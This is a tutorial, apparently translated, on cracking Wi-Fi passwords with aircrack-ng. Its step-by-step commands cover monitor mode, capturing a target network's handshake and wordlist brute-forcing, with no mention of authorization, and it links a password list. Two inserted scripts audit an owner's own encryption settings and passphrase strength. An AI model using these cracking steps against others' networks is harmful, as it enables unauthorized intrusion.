Aircrack-ng wireless cracking summary, aircrack-ng
On Linux I use Ubuntu. On Ubuntu you can install it directly with sudo apt-get install aircrack-ng.
Other Linux distributions should be able to install it with yum -y install aircrack-ng. If the package source cannot be reached through a proxy, the download is very slow.
------------------------------------------------------------------------------------
Method:
1. Make sure your wireless adapter is enabled: run ifconfig and check whether wlan0 (or another wireless adapter) is up. If it is not, the following steps cannot be performed.
You can run ifconfig -a to check whether a wireless adapter is present at all, then run ifconfig wlan0 up to bring it up (wlan0 is the adapter name shown by ifconfig -a).
2. Enable the NIC to be in the listening mode:
sudo airmon-ng start wlan0
3. View the wireless networks and capture wireless packets.
sudo airodump-ng mon0
Note: mon0 is the alias the adapter gets once monitor mode has been started. The following error commonly occurs:
rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network
If it does, work around it like this:
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo airodump-ng wlan0
Or:
airmon-ng check kill
airmon-ng start <interface>
airodump-ng wlan0mon
However, this leaves network management disabled. To stop or restart the NetworkManager service by hand:
sudo service network-manager stop # stop the nm service
sudo service network-manager start # start the nm service
If everything is okay:
The wireless networks that can be found are listed. PWR is the signal level (a larger value means a stronger signal), ESSID is the network name, and ENC is the encryption method (WEP is the easiest to crack; WPA and WPA2 can only be cracked by brute force).
Find the ESSID you want to crack.
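As an added example (not part of the original post and not aircrack-ng project code): the same airodump-ng survey is what a network owner uses to find their own access points that are still open, on WEP, or on WPA1/TKIP and need migrating. The script below parses the <prefix>-01.csv file that airodump-ng -w <prefix> writes next to the .cap and rates each AP from its Privacy and Cipher columns. It assumes the column layout of airodump-ng's CSV output; the sample rows, BSSIDs and ESSIDs are constructed for the example.

```python
import csv

# Constructed sample in the layout of the <prefix>-01.csv file that
# airodump-ng -w <prefix> writes (assumption: this column order); the
# BSSIDs and ESSIDs are made up for the example, not captured data.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP, WEP, , -40, 120, 9800,   0.  0.  0.  0,  7, Lab-WEP,
00:11:22:33:44:66, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  90,    0,   0.  0.  0.  0,  9, Corp-WPA2,
00:11:22:33:44:77, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN, , , -70,  30,    0,   0.  0.  0.  0,  5, Guest,
00:11:22:33:44:88, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA WPA2, TKIP CCMP, PSK, -62,  45,    0,   0.  0.  0.  0,  6, Legacy,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_access_points(text):
    """Return the AP section (rows up to the first blank line) as a list of dicts."""
    section = []
    for line in text.splitlines():
        if not line.strip():
            if section:
                break          # a blank line ends the AP section; stations follow it
            continue           # the real file starts with a blank line
        section.append(line)
    reader = csv.reader(section, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    return [dict(zip(header, (v.strip() for v in row))) for row in reader]


def rate_encryption(privacy, cipher):
    """Map the Privacy/Cipher columns (ENC/CIPHER on screen) to a level and reason."""
    p = privacy.upper().split()
    c = cipher.upper().split()
    if not p or "OPN" in p:
        return "CRITICAL", "open network, no encryption at all"
    if "WEP" in p:
        return "CRITICAL", "WEP keys are recoverable from captured traffic; migrate to WPA2/WPA3"
    if "TKIP" in c or ("WPA" in p and not {"WPA2", "WPA3"} & set(p)):
        return "WEAK", "WPA1/TKIP is deprecated; use WPA2-CCMP or WPA3"
    return "OK", "WPA2/WPA3 with CCMP; strength now rests on the passphrase"


def audit(text):
    """Rate every AP in the survey, worst findings first."""
    order = {"CRITICAL": 0, "WEAK": 1, "OK": 2}
    findings = []
    for ap in parse_access_points(text):
        level, reason = rate_encryption(ap.get("Privacy", ""), ap.get("Cipher", ""))
        findings.append({"essid": ap.get("ESSID", ""), "bssid": ap.get("BSSID", ""),
                         "channel": ap.get("channel", ""), "level": level, "reason": reason})
    return sorted(findings, key=lambda f: order[f["level"]])


if __name__ == "__main__":
    for f in audit(SAMPLE_CSV):
        print(f"{f['level']:8} {f['essid']:12} {f['bssid']} ch{f['channel']:>3}  {f['reason']}")
```

Run it against a real survey with audit(open("file-01.csv").read()); a mixed "WPA WPA2" network with TKIP still enabled is flagged WEAK because the AP will still accept the weaker cipher.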
4. After determining the target:
sudo airodump-ng -c 6 --bssid <target's MAC> -w file mon0
-c 6 is the channel of the network (the CH column).
<target's MAC> is the MAC address (BSSID) of the target you want to crack.
file is the prefix of the capture file in which the handshake with the target is stored.
5. Once enough packets (that is, data) have been received, start cracking.
sudo aircrack-ng file-01.cap
file-01.cap is the capture file holding the handshake data.
If it is a WEP password, it can be cracked directly once enough packets (10,000) have been collected.
For WPA/WPA2 encryption you must first capture the handshake, and only then can you start brute forcing with a password file (one is available at http://static.hackersgarage.com/darkc0de.lst.gz). If the password is complex enough, such a password file is not enough and you have to build a more complex one yourself.
sudo aircrack-ng -w dic file-01.cap
The password is displayed after successful cracking.
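An added example, not from the original post: seen from the network owner's side, the useful question is whether your own WPA/WPA2-PSK passphrase would fall to the wordlist step above. The script assesses a candidate passphrase against a small constructed wordlist (standing in for a list like the one linked) together with a rough guess-entropy estimate. The wordlist contents, the variant rules checked and the 60-bit threshold are assumptions made for the example.

```python
import math

# Constructed mini wordlist; a real check would load a full list from a file.
COMMON_PASSPHRASES = {"password", "12345678", "qwertyuiop", "iloveyou", "letmein", "sunshine"}

WPA_MIN, WPA_MAX = 8, 63  # passphrase length limits of WPA/WPA2-PSK


def dictionary_hit(passphrase, wordlist):
    """True if the passphrase, or an obvious variant, is in the wordlist.
    Variants covered (assumption): case folding and a trailing run of digits."""
    base = passphrase.lower()
    stripped = base.rstrip("0123456789")
    return base in wordlist or bool(stripped and stripped in wordlist)


def entropy_bits(passphrase):
    """Upper-bound guess entropy: length * log2(size of the character classes used).
    This assumes every character was chosen at random, so real strength is lower."""
    size = 0
    if any(ch.islower() for ch in passphrase):
        size += 26
    if any(ch.isupper() for ch in passphrase):
        size += 26
    if any(ch.isdigit() for ch in passphrase):
        size += 10
    if any(not ch.isalnum() for ch in passphrase):
        size += 33
    return len(passphrase) * math.log2(size) if size else 0.0


def assess(passphrase, wordlist=COMMON_PASSPHRASES, min_bits=60):
    """Return (verdict, reason) for a candidate WPA/WPA2-PSK passphrase."""
    n = len(passphrase)
    if not WPA_MIN <= n <= WPA_MAX:
        return "INVALID", f"WPA-PSK passphrases must be {WPA_MIN}-{WPA_MAX} characters, got {n}"
    if dictionary_hit(passphrase, wordlist):
        return "REJECT", "passphrase (or a trivial variant of it) is in the wordlist"
    bits = entropy_bits(passphrase)
    if bits < min_bits:
        return "WEAK", f"about {bits:.0f} bits of guess entropy; make it longer"
    return "OK", f"about {bits:.0f} bits of guess entropy and not in the wordlist"


if __name__ == "__main__":
    for candidate in ["password", "Password1", "short", "Summer20", "correct-horse-battery-staple-2024"]:
        verdict, reason = assess(candidate)
        print(f"{verdict:8} {candidate!r}: {reason}")
```

The length check comes first because aircrack-ng never needs to try a passphrase outside 8-63 characters; the dictionary check comes before the entropy estimate because a long passphrase that sits verbatim in a wordlist has no practical strength regardless of its character classes.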